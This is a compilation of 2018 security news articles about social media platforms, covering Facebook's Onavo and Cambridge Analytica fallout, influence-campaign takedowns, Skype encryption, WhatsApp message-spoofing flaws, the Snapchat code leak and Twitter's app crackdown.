Onavo Protect is a virtual-private network service aimed at helping users secure their personal information over public Wi-Fi networks. The app also alerts users when other apps use too much data.

Since acquiring Onavo in 2013, Facebook has used it to track what apps people were using on phones. This surveillance helped Facebook detect trendy services, tipping off the company to startups it might want to buy and areas it might want to work on for upcoming features.

Facebook said in a statement that it has "always been clear when people download Onavo about the information that is collected and how it is used."

But Onavo fell out of compliance with Apple's app-store guidelines after they were tightened two months ago to protect the reservoir of personal information that people keep on their iPhones and iPads.

Apple's revised guidelines require apps to get users' express consent before recording and logging their activity on a device. According to Apple, the new rules also "made it explicitly clear that apps should not collect information about which other apps are installed on a user's device for the purposes of analytics or advertising/marketing."

Facebook will still be able to deploy Onavo on devices powered by Google's Android software.

Onavo's ouster from Apple's app store widens the rift between two of the world's most popular companies.

Apple CEO Tim Cook has been outspoken in his belief that Facebook does a shoddy job of protecting its 2.2 billion users' privacy — something that he has framed as "a fundamental human right."

Cook sharpened his criticism following the Cambridge Analytica scandal. He emphasized that Apple would never be caught in the same situation as Facebook because it doesn't collect information about its customers to sell advertising. Facebook CEO Mark Zuckerberg fired back in a separate interview and called Cook's remarks "extremely glib." Zuckerberg implied that Apple caters primarily to rich people with a line of products that includes the $1,000 iPhone X.

Late Wednesday, Facebook said it moved to ban the myPersonality app after it found user information was shared with researchers and companies "with only limited protections in place." The company said it would notify the app's users that their data may have been misused.

It said myPersonality was "mainly active" prior to 2012. Though Facebook has tightened its rules since then, it is only now reviewing those older apps following the Cambridge Analytica scandal.

The app was created in 2007 by researcher David Stillwell and allowed users to take a personality questionnaire and get feedback on the results.

"There was no misuse of personal data," Stillwell said in a statement, adding that "this ban appears to be purely cosmetic." Stillwell said users gave their consent and the app's data was fully anonymized before it was used for academic research. He also rejected Facebook's assertion that he refused to submit to an audit.


Facebook Suspends Hundreds of Apps Over Data Concerns
23.8.2018 securityweek
Social

Facebook on Wednesday said it has suspended more than 400 of thousands of applications it has investigated to determine whether people's personal information was being improperly shared.

Applications were suspended "due to concerns around the developers who built them or how the information people chose to share with the app may have been used," vice president of product partnerships Ime Archibong said in a blog post.

Apps put on hold at the social network were being scrutinized more closely, according to Archibong.

The app unit launched in March by Facebook stemmed from the Cambridge Analytica data privacy scandal.

Facebook admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for Donald Trump's 2016 presidential campaign.

Archibong said that a myPersonality app was banned by the social network for not agreeing to an audit and "because it's clear that they shared information with researchers as well as companies with only limited protections in place."

Facebook planned to notify the approximately four million members of the social network who shared information with myPersonality, which was active mostly prior to 2012, according to Archibong.

Facebook has modified app data sharing policies since the Cambridge Analytica scandal.

"We will continue to investigate apps and make the changes needed to our platform to ensure that we are doing all we can to protect people’s information," Archibong said.

Britain's data regulator said last month that it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office began investigating the social media giant earlier this year due to the Cambridge Analytica data mishandling.

Cambridge Analytica has denied accusations and has filed for bankruptcy in the United States and Britain.

Silicon Valley-based Facebook last month acknowledged it faces multiple inquiries from regulators about the Cambridge Analytica user data scandal.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg was grilled about the breach in US Congress in April.


Microsoft Rolls Out End-to-End Encryption in Skype
22.8.2018 securityweek
Social

Skype users on the latest version of the messaging application can now take full advantage of end-to-end encryption in their conversations, Microsoft says.

Rolled out under the name of Private Conversations, the feature was initially introduced for a few Skype users in January this year, as preview, and is now available in the latest version of Skype on Windows, Mac, Linux, iOS and Android (6.0+). It started arriving on desktops a couple of weeks ago.

Private Conversations, which takes advantage of the industry standard Signal Protocol by Open Whisper Systems, secures text chat messages and audio calls, along with any files the conversation partners share over Skype (including photo, audio, and video files).

Skype has been long using TLS (transport-level security) and AES (Advanced Encryption Standard) to encrypt messages in transit, but the addition of end-to-end encryption adds an extra layer of privacy.

Now, not only are the conversation channels secured, but also are all of the transmitted messages kept encrypted when on Microsoft’s servers, meaning that they are only accessible to those engaged in the conversation.

Private Conversations, however, can only be accessed on one device at a time, the software giant reveals.

To take advantage of the feature, users simply need to tap or click on New Chat and then select Private Conversation. Next, they need to select the contacts they want to start the private conversation with, and these will receive a notification asking them to accept the invitation.

Once a contact accepts the invitation, the private conversation is available on the devices the invitation was sent from/accepted on.

One can also start a private conversation with a contact they are already chatting with.

Users can also delete private conversations, meaning that all of the content will be erased from the device. They can then pick up the conversation again, without having to send a new invitation.


Facebook Stops Misinformation Campaigns Tied to Iran, Russia
22.8.2018 securityweek
Social

Facebook said Tuesday it stopped stealth misinformation campaigns from Iran and Russia, shutting down accounts as part of its battle against fake news ahead of elections in the United States and elsewhere.

Facebook removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing," according to chief executive Mark Zuckerberg.

While the investigation was ongoing, and US law enforcement notified, content from some of the pages was traced back to Iran and from others linked to groups previously linked to Russian intelligence operations, the social network said.

"We believe they were parts of two sets of campaigns," Zuckerberg said.

The accounts, some of them at Facebook-owned Instagram, were presented as being independent news or civil society groups but were actually working in coordinated efforts, social network firm executives said in a briefing with reporters.

Content posted by accounts targeted Facebook users in Britain, Latin America, the Middle East and the US, according to head of cybersecurity policy Nathaniel Gleicher.

He said that posts by the involved accounts were still being scrutinized and their goals were unclear at this point.

The Facebook investigation was prompted by a tip from cybersecurity firm FireEye regarding a collection of "Liberty Front Press" pages at the social network and other online services.

Facebook linked the pages to Iranian state media through publicly available website registration information, computer addresses and information about account administrators, according to Gleicher.

Among the accounts was one from "Quest 4 Truth" claiming to be an independent Iranian media organization. It was linked to Press TV, an English-language news network affiliated with Iranian state media, Gleicher said.

The first "Liberty Front Press" accounts found were at Facebook were created in 2013 and posted primarily political content focused on the Middle East along with Britain, Latin America and the US.

- Russian military tie -

Facebook also removed a set of pages and accounts linked to sources the US government previously identified as Russian military services, according to Gleicher.

"While these are some of the same bad actors we removed for cybersecurity attacks before the 2016 US election, this more recent activity focused on politics in Syria and Ukraine," Gleicher said.

The accounts were associated with Inside Syria Media Center, which the Atlantic Council and other organizations have identified as covertly spreading pro-Russian and pro-Assad content.

US Senator Richard Burr, a Republican who chairs the select committee on intelligence, said that the halted campaigns further prove that "the goal of these foreign social media campaigns is to sow discord" and "that Russia is not the only hostile foreign actor developing this capability."

Facebook chief operating officer Sheryl Sandberg is among Silicon Valley executives set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.

"We get that 2018 is a very important election year, not just in the US," Zuckerberg responded when asked about the upcoming hearing.

"So this is really serious. This is a top priority for the company."

In July, Facebook shut down more than 30 fake pages and accounts involved in what appeared to be a "coordinated" attempt to sway public opinion on political issues ahead of November midterm elections, but did not identify the source.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied to Russia, which used the platform to spread disinformation ahead of the 2016 US presidential election.


Facebook Announces 2018 Internet Defense Prize Winners
17.8.2018 securityweek
Social

Facebook this week announced the winners of its 2018 Internet Defense Prize. Three teams earned a total of $200,000 this year for innovative defensive security and privacy research.

In the past years, Facebook awarded only one team a prize of $100,000 as part of the initiative. In 2016, the winning team presented research focusing on post-quantum security for TLS, and last year’s winners demonstrated a novel technique of detecting credential spear-phishing attacks in enterprise environments.

Winners of Facebook Internet Defense Prize

Facebook says this year’s submissions were of very high quality so the social media giant has decided to reward three teams instead of just one.Winners of Facebook Internet Defense Prize

The first prize, $100,000 as in the previous years, was won by a team from imec-DistriNet at Belgian university KU Leuven. Their paper, titled “Who Left Open the Cookie Jar? A Comprehensive Evaluation of Third-Party Cookie Policies,” describes methods that browsers can employ to prevent cross-site attacks and third-party tracking via cookies.

It’s worth mentioning that a different team of researchers from KU Leuven has been credited for discovering the recently disclosed Foreshadow speculative execution vulnerabilities affecting Intel processors.

Second place, a team from Brigham Young University, earned $60,000 for a paper titled “The Secure Socket API: TLS as an Operating System Service.” The research focuses on a prototype implementation that makes it easier for app developers to use cryptography.

“We believe safe-by-default libraries and frameworks are an important foundation for more secure software,” Facebook said.

Third place, a group from the Chinese University of Hong Kong and Sangfor Technologies, earned $40,000 for “Vetting Single Sign-On SDK Implementations via Symbolic Reasoning.”

“This work takes a critical look at the implementation of single sign-on code. Single sign-on provides a partial solution to the internet’s over-reliance on passwords. This code is widely used, and ensuring its safety has direct implications for user safety online,” Facebook explained.

Last week, Facebook announced that it had awarded a total of more than $800,000 as part of its Secure the Internet Grants, which the company unveiled in January. Facebook has prepared a total of $1 million for original defensive research, offering grants of up to $100,000 per proposal.


Social Mapper – Correlate social media profiles with facial recognition
10.8.2018 securityaffairs
Social

Trustwave developed Social Mapper an Open Source Tool that uses facial recognition to correlate social media profiles across different social networks.
Security experts at Trustwave have released Social Mapper, a new open-source tool that allows finding a person of interest across social media platform using facial recognition technology.

The tool was developed to gather intelligence from social networks during penetration tests and are aimed at facilitating social engineering attacks.

Social Mapper facial recognition tool automatically searches for targets across eight social media platforms, including Facebook, Instagram, Twitter, LinkedIn, Google+, VKontakte (The Russian Facebook), and Chinese Weibo and Douban.

An individual could be searcher by providing a name and a picture, the tool allows to conduct an analysis “on a mass scale with hundreds or thousands of individuals” at once.

“Performing intelligence gathering is a time-consuming process, it typically starts by attempting to find a person’s online presence on a variety of social media sites. While this is a easy task for a few, it can become incredibly tedious when done at scale.” Trustwave states in a blog post.

“Introducing Social Mapper an open source intelligence tool that uses facial recognition to correlate social media profiles across a number of different sites on a large scale. Trustwave, which provides ethical hacking services, has successfully used the tool in a number of penetration tests and red teaming engagements on behalf of clients.”

Social Mapper

The Social Mapper search for specific profiles in three stages:

Stage 1—The tool creates a list of targets based on the input you give it. The list can be provided via links in a CSV file, images in a folder or via people registered to a company on LinkedIn.

Stage 2—Once the targets are processed, the second stage of Social Mapper kicks in that automatically starts searching social media sites for the targets online.

This stage can be time-consuming, the search could take over 15 hours for lists of 1,000 people and use a significant amount of bandwidth, for this reason, experts recommend running the tool overnight on a machine with a good internet connection.

Stage 3—The Social Mapper starts generating a variety of output, including a CSV file with links to the profile pages of the target list and a visual HTML report.

Of course, this intelligence-gathering tool could be abused by attackers to collect information to use in highly sophisticated spear- phishing campaigns.

Experts from Trustwave warn of potential abuses of Social Mapper that are limited “only by your imagination.” Attackers can use the results obtained with the tool to:

Create fake social media profiles to ‘friend’ the targets and send them links to credential capturing landing pages or downloadable malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
View target photos looking for employee access card badges and familiarise yourself with building interiors.
If you want to start using the tool you can find it for free on GitHub.

Trustwave researcher Jacob Wilkin will present Social Mapper at the Black Hat USA conference today.


Researchers find vulnerabilities in WhatsApp that allow to spread Fake News via group chats
9.8.2018 securityaffairs
Social

WhatsApp has been found vulnerable to multiple security flaws that could allow malicious users to spread fake news through group chats.
WhatsApp, the most popular messaging application in the world, has been found vulnerable to multiple security flaws that could allow malicious users to intercept and modify the content of messages sent in both private as well as group conversations.

Researchers at security firm Check Point have discovered several vulnerabilities in the popular instant messaging app Whatsapp, the flaws take advantage of a bug in the security protocols to modify the messages.

An attacker could exploit the flaws “to intercept and manipulate messages sent by those in a group or private conversation” as well as “create and spread misinformation”.

The issues affect the way WhatsApp mobile application communicates with the WhatsApp Web and decrypts the messages using the protobuf2 protocol.

The flaws allow hackers to abuse the ‘quote’ feature in a WhatsApp group conversation to change the identity of the sender, or alter the content of members’ reply to a group chat, or send private messages to one of the group members disguised as a group message.

Experts pointed out the that flaws could not be exploited to access the content of end-to-end encrypted messages and in order to exploit them, the attackers must be already part of group conversations.

“Check Point researchers have discovered a vulnerability in WhatsApp that allows a threat actor to intercept and manipulate messages sent by those in a group or private conversation.” reads the blog post published by the experts.

“The vulnerability so far allows for three possible attacks:

Changing a reply from someone to put words into their mouth that they did not say.
Quoting a message in a reply to a group conversation to make it appear as if it came from a person who is not even part of the group.
Sending a message to a member of a group that pretends to be a group message but is in fact only sent to this member. However, the member’s response will be sent to the entire group.”
The experts demonstrated the exploitation of the flaws by changing a WhatsApp chat entry sent by one member of a group.

Below a video PoC of the attack that shows how to modify WhatsApp Chats and implements the three different attacks.

The research team from CheckPoint researchers (Dikla Barda, Roman Zaikin, and Oded Vanunu) developed a custom extension for the popular tool Burp Suite, dubbed WhatsApp Protocol Decryption Burp Tool, to intercept and modify encrypted messages on their WhatsApp Web.

“By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues.” states the experts.

The extension is available on Github, it requires the attacker to provide its private and public keys.

“The keys can be obtained from the key generation phase from WhatsApp Web before the QR code is generated:” continues the report published by the experts.

“After we take these keys we need to take the “secret” parameter which is sent by the mobile phone to WhatsApp Web while the user scans the QR code:”

Experts demonstrated that using their extension an attacker can:

Change the content of a group member’s reply.
Change the identity of a sender in a group chat. The attack works even if the attacker is not a member of the group. “Use the ‘quote’ feature in a group conversation to change the identity of the sender, even if that person is not a member of the group.”
Send a Private Message in a Group, but when the recipient replies the members of the group will see it.

The experts reported the flaws to WhatsApp, but the company explained that end-to-end encryption if not broken by the attacks.

“We carefully reviewed this issue and it’s the equivalent of altering an email to make it look like something a person never wrote.” WhatsApp said in a statement.

“This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp.”

“These are known design trade-offs that have been previously raised in public, including by Signal in a 2014 blog post, and we do not intend to make any change to WhatsApp at this time,” WhatsApp security team replied to the researchers.

Checkpoint experts argue that the flaws could be abused to spread fake news and misinformation, for this reason, it is essential to fix the flaws as soon as possible along with putting limits on the forwarded messages.


Snapchat source Code leaked after an iOS update exposed it
9.8.2018 securityaffairs
Social

Hackers leaked the Snapchat source code on GitHub, after they attempted to contact the company for a reward.
Hackers gained access to the source code of the frontend of Snapchat instant messaging app for iOS and leaked it on GitHub.

A GitHub account associated with a person with the name Khaled Alshehri who claimed to be from Pakistan and goes online with the handle i5xx created the GitHub repository titled Source-Snapchat.

After being notified, Snap Inc., has confirmed the authenticity of the source core and asked GitHub to remove it by filing a DMCA (Digital Millennium Copyright Act) request.

“Please provide a detailed description of the original copyrighted work that has allegedly been infringed. If possible, include a URL to where it is posted online.**”

“SNAPCHAT SOURCE CODE. IT WAS LEAKED AND A USER HAS PUT IT IN THIS GITHUB REPO. THERE IS NO URL TO POINT TO BECAUSE SNAP INC. DOESN’T PUBLISH IT PUBLICLY.” reads the reply of the company to a question included in the DMCA request.

SnapChat source code

According to Snapchat, the source code was leaked after an iOS update made in May that exposed a “small amount” of the app source code. The problem was solved and Snap Inc ensured that the data leak has no impact on the Snapchat users.

The hackers who leaked the source code are threatening the company of releasing new parts of the leaked code until the Snap Inc will not reply. Likely they are blackmailing the company.SnapChat source code

SnapChat source code

Two members of the group who leaked the Snapchat source code have been posting messages written in Arabic and English on Twitter.

The two hackers are allegedly based in Pakistan and France, they were expecting a bug bounty reward from the company without success.

At the time of writing two other forks containing the source code are still present on GitHub, it seems that the code was published just after the iOS update.

Snapchat currently run an official bug bounty program through HackerOne and has already paid several rewards for critical vulnerabilities in its app.


Facebook Asks Big Banks to Share Customer Details
7.8.2018 securityweek 
Social

Facebook has asked major US banks to share customer data to allow it to develop new services on the social network's Messenger texting platform, a banking source told AFP on Monday.

Facebook had discussions with Chase, JPMorgan, Citibank, and Wells Fargo several months ago, said the source, who asked to remain anonymous.

The Silicon Valley-based social network also contacted US Bancorp, according to the Wall Street Journal, which first reported the news.

Facebook, which has faced intense criticism for sharing user data with many app developers, was interested in information including bank card transactions, checking account balances, and where purchases were made, according to the source.

Facebook confirmed the effort in a statement to AFP, but said it was not asking for transaction data.

"Like many online companies with commerce businesses, we partner with banks and credit card companies to offer services like customer chat or account management," Facebook said.

The goal was to create new ways for Messenger to be woven into, and facilitate, interactions between banks and customers, according to the reports. The smartphone texting service boasts 1.3 billion users.

"The idea is that messaging with a bank can be better than waiting on hold over the phone -- and it's completely opt-in," the statement said.

Citigroup declined to comment regarding any possible discussions with Facebook about Messenger.

"While we regularly have conversations about potential partnerships, safeguarding the security and privacy of our customers' data and providing customer choice are paramount in everything we do," Citigroup told AFP by email.

JPMorgan Chase spokeswoman Patricia Wexler directed AFP to a statement given to the Wall Street Journal saying, "We don't share our customers' off-platform transaction data with these platforms and have had to say 'No' to some things as a result."

Wells Fargo decline to address the news.

Privacy worries

Messenger can be used by businesses to help people keep track of account information such as balances, receipts, or shipping dates, according to the social network.

"We're not using this information beyond enabling these types of experiences -- not for advertising or anything else," Facebook explained in its statement.

"A critical part of these partnerships is keeping people's information safe and secure."

But word Facebook is fishing for financial information comes amid concerns it has not vigilantly guarded private information.

Facebook acknowledged last month that it was facing multiple inquiries from US and British regulators about a scandal involving the now bankrupt British consultancy Cambridge Analytica.

In Facebook's worst ever public relations disaster, it admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for US President Donald Trump's 2016 election campaign.

Facebook CEO Mark Zuckerberg announced in May he was rolling out privacy controls demanded by European regulators to Facebook users worldwide because "everyone cares about privacy."

The social network is now looking at cooler growth following a years-long breakneck pace.

Shares in Facebook plummeted last week, wiping out some $100 billion, after the firm missed quarterly revenue forecasts and warned growth would be far weaker than previously estimated.

Shares in the social network have regained some ground, and rose 4.4 percent to close at $185.69 on Monday.


Facebook reported and blocked attempts to influence campaign ahead of midterms US elections
2.8.2018 securityweek 
Social

Facebook removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the midterm US elections
Facebook has removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the forthcoming midterm US elections.

Facebook midterm US elections

Facebook is shutting down content and accounts “engaged in coordinated inauthentic behavior”

At the time there is no evidence that confirms the involvement of Russia, but intelligence experts suspect that Russian APT groups were behind the operation.

Facebook founder Mark Zuckerberg announced its response to the recently disclosed abuses.

“One of my top priorities for 2018 is to prevent misuse of Facebook,” Zuckerberg said on his own Facebook page.

“We build services to bring people closer together and I want to ensure we’re doing everything we can to prevent anyone from misusing them to drive us apart.”

According to Facebook, “some of the activity is consistent” with Tactics, Techniques and Procedures (TTPs) associated with the Internet Research Agency that is known as the Russian troll farm that was behind the misinformation campaign aimed at the 2016 Presidential election.

“But we don’t believe the evidence is strong enough at this time to make public attribution to the IRA,” Facebook chief security officer Alex Stamps explained to the reporters.

Facebook revealed that some 290,000 users followed at least one of the blocked pages.

“Resisters” enlisted support from real followers for an August protest in Washington against the far-right “Unite the Right” group.

According to Facebook, fake pages that were created more than a year ago, in some cases the pages were used to promote real-world events, two of them have taken place.

Just after the announcement, the US Government remarked it will not tolerate any interference from foreign states.

“The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation-state or other malicious actors,” deputy press secretary Hogan Gidley told reporters.

The investigation is still ongoing, but the social media giant decided to disclose early findings to shut down the orchestrated misinformation campaign.

Nathaniel Gleicher, Head of Cybersecurity Policy at Facebook, explained that the threat actors used VPNs and internet phone services to protect their anonymity.

“In total, more than 290,000 accounts followed at least one of these Pages, the earliest of which was created in March 2017. The latest was created in May 2018.
The most followed Facebook Pages were “Aztlan Warriors,” “Black Elevation,” “Mindful Being,” and “Resisters.” The remaining Pages had between zero and ten followers, and the Instagram accounts had zero followers.
There were more than 9,500 organic posts created by these accounts on Facebook and one piece of content on Instagram.
They ran about 150 ads for approximately $11,000 on Facebook and Instagram, paid for in US and Canadian dollars. The first ad was created in April 2017, and the last was created in June 2018.
The Pages created about 30 events since May 2017. About half had fewer than 100 accounts interested in attending. The largest had approximately 4,700 accounts interested in attending, and 1,400 users said that they would attend.” said Gleicher.
Facebook announced it would start notifying users that were following the blocked account and users who said would attend events created by one of the suspended accounts and pages

Facebook reported its findings to US law enforcement agencies, Congress, and other tech companies.

“Today’s disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity,” declared the Senate Intelligence Committee’s top Democrat Mark Warner.


Facebook Uncovers Political Influence Campaign Ahead of Midterms
1.8.2018 securityweek 
Social 

Facebook said Tuesday it shut down 32 fake pages and accounts involved in an apparent "coordinated" effort to stoke hot-button issues ahead of November midterm US elections, but could not identify the source although Russia is suspected of involvement.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied directly to Russian actors, who American officials say used the platform to spread disinformation ahead of the 2016 US presidential election.

The US intelligence community has concluded that Russia sought to sway the vote in Donald Trump's favor, and Facebook was a primary tool in that effort, using targeted ads to escalate political tensions and push divisive online content.

With the 2018 mid-terms barely three months away, Facebook founder Mark Zuckerberg announced his company's crackdown.

"One of my top priorities for 2018 is to prevent misuse of Facebook," Zuckerberg said on his own Facebook page.

"We build services to bring people closer together and I want to ensure we're doing everything we can to prevent anyone from misusing them to drive us apart."

Trump, now president, has repeatedly downplayed Kremlin efforts to interfere in US democracy.

Two weeks ago, he caused an international firestorm when he stood alongside Russian President Vladimir Putin and cast doubt on assertions that Russia tried to sabotage the vote.

But after Facebook's announcement, the White House stressed Trump opposed all efforts at election interference.

"The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation state or other malicious actors," deputy press secretary Hogan Gidley told reporters.

Facebook said "some of the activity is consistent" with that of the Saint Petersburg-based Internet Research Agency -- the Russian troll farm that managed many false Facebook accounts used to influence the 2016 vote.

"But we don't believe the evidence is strong enough at this time to make public attribution to the IRA," Facebook chief security officer Alex Stamps said during a conference call with reporters.

Special Counsel Robert Mueller is heading a sprawling investigation into possible collusion with Russia by Trump's campaign to tip the vote toward the real estate tycoon.

Mueller has indicted the Russian group and 12 Russian hackers connected to the organization.

Facebook said it is shutting down 32 pages and accounts "engaged in coordinated inauthentic behavior," even though it may never be known for certain who was behind the operation.

The tech giant's investigation is at an early stage, but was revealed now because one of the pages being covertly operated was orchestrating a counter-protest to a white nationalism rally in Washington.

The coordinators of a deadly white-supremacist event in Charlottesville last year reportedly have been given a permit to hold a rally near the White House on August 12, the anniversary of the 2017 gathering.

Facebook said it will notify members of the social network who expressed interest in attending the counter-protest.

- US 'not doing' enough -

Facebook has briefed US law enforcement agencies, Congress and other tech companies about its findings.

"Today's disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity," said the Senate Intelligence Committee's top Democrat Mark Warner.

The panel's chairman, Republican Senator Richard Burr, said he was glad to see Facebook take a "much-needed step toward limiting the use of their platform by foreign influence campaigns."

"The goal of these operations is to sow discord, distrust and division," he added. "The Russians want a weak America."

US lawmakers have introduced multiple bills aimed at boosting election security.

While top Senate Democrat Chuck Schumer applauded Facebook's action, he said the Trump administration itself "is not doing close to enough" to protect elections.

Some of the most-followed pages that were shut down included "Resisters" and "Aztlan Warriors."

Facebook said some 290,000 users followed at least one of the pages.

"Resisters" enlisted support from real followers for an August protest in Washington against the far-right "Unite the Right" group.

Inauthentic pages dating back more than a year organized an array of real world events, all but two of which have taken place, according to Facebook.

The news comes just days after Facebook suffered the worst single-day evaporation of market value for any company, after missing revenue forecasts for the second quarter and offering soft growth projections.

Zuckerberg's firm says the slowdown will come in part due to its new approach to privacy and security, which helped experts uncover these so-called "bad actors."


Twitter removed more than 143,000 apps from the messaging service
28.7.2018 securityaffairs
Social

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.
Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

jack

@jack
We’re committing Twitter to help increase the collective health, openness, and civility of public conversation, and to hold ourselves publicly accountable towards progress.

5:33 PM - Mar 1, 2018 · San Francisco, CA
14.3K
11.7K people are talking about this
Twitter Ads info and privacy
The social media giant was restricting the access to its application programming interfaces (APIs) that allows developers to automate the interactions with the platform (i.e. Tweet posting).

Spam and abuse issues are important problems for the platform, every day an impressive number of bots is used to influence the sentiment on specific topics or to spread misinformation or racism content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter it a hard task, now since Tuesday, Twitter deployed a new application process for developers that intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.”Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service,”

Twitter messaging service

Anyway, there are many legitimate applications that used Twitter APIs to automate several processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.


Twitter Curbs Access for 143,000 Apps in New Crackdown
26.7.2018 securityweek
Social

Twitter said Tuesday it had removed more than 143,000 apps from the messaging service since April in a fresh crackdown on "malicious" activity from automated accounts.

The San Francisco-based social network said it was tightening access to its application programming interfaces (APIs) that allows developers to make automated Twitter posts.

"We're committed to providing access to our platform to developers whose products and services make Twitter a better place," said Twitter senior product management director Rob Johnson.

"However, recognizing the challenges facing Twitter and the public -- from spam and malicious automation to surveillance and invasions of privacy -- we're taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter."

Johnson offered no details on the revoked apps, but Twitter has been under pressure over automated accounts or "bots" which spread misinformation or falsely amplify a person or political cause.

"We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter," he said.

"We're continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently."

As of Tuesday, any developer seeking access to create a Twitter app will have to go through a new application process, providing details of how they will use the service.

"We're committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service," Johnson said.

Automated accounts are not always malicious -- some are designed to tweet our emergency alerts, art exhibits or the release of a Netflix program -- but "bots" have been blamed for spreading hoaxes and misinformation in a bid to manipulate public opinion.


Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

19.7.2018 securityaffairs Social

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.
Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the gains of the giant of social networks, but it is a strong message to all the company that must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

According to the GDPR, the penalties allowed under the new privacy regulation are much greater, fines could reach up to 4% of the global turnover, that in case of Facebook are estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting
out the detail of our areas of concern and invited their representations on
these and any action we propose. ” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”


Facebook Faces Australia Data Breach Compensation Claim
18.7.2018 securityweek 
Social

Facebook could face a hefty compensation bill in Australia after a leading litigation funder lodged a complaint with the country's privacy regulator over users' personal data shared with a British political consultancy.

The social networking giant admitted in April the data of up to 87 million people worldwide -- including more than 300,000 in Australia -- was harvested by Cambridge Analytica.

Under Australian law, all organisations must take "reasonable steps" to ensure personal information is held securely and IMF Bentham has teamed up with a major law firm to lodge a complaint with the Office of the Australian Information Commissioner (OAIO).

The OAIO launched an investigation into the alleged breaches in April and depending on its outcome, a class action could follow.

IMF said in a statement late Tuesday it was seeking "compensation for Facebook users arising from Facebook's alleged breaches of the Australian Privacy Principles contained in the Privacy Act 1988".

"The alleged breaches surround the circumstances in which a third party, Cambridge Analytica, gained unauthorised access to users' profiles and information.

"The complaint seeks financial recompense for the unauthorised access to, and use of, their personal data."

